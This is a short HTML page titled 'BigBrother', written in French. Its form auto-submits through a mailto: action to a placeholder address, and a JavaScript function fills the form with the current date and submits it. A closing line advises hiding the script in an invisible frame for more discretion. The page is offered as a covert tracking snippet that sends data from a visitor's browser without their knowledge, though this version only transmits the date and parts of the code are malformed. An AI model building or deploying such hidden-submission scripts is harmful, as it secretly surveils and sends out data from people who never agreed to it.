<HTML>
<HEAD>
<TITLE>BigBrother</TITLE>
</HEAD>
<BODY BGCOLOR="#000000" TEXT="#00ffff" LINK="#0000ff" VLINK="#804040" ALINK="#ff0000">
<center>
<FORM NAME="trust" ENCTYPE="text/plain" ACTION="mailto:vous@hote.domaine?subject=Trust" METHOD="POST" TARGET="Corps">
<INPUT TYPE="text" NAME="mess" value="" OnBlur='document.trust.Bonjour.submit();'></INPUT>
<INPUT TYPE="SUBMIT" NAME="Bonjour">
</FORM></center>

<SCRIPT LANGUAGE="JavaScript">
<!--
function BigBrother() {
now = new Date();
message = now.getDate()
	+ "****"
	+ eval(now.getMonth() +1)
	+ "****"
	+ now.getYear();
document.trust.mess.value=message;
document.trust.submit();
}
//-->
</SCRIPT>
<p>Pour plus de discr�tion, mettez ce script dans une frame cach�e...</p>
<p><form>
<INPUT TYPE=BUTTON VALUE=Fermer onClick='self.close();'>
</p>
</form></center></p>
</BODY>
</HTML>
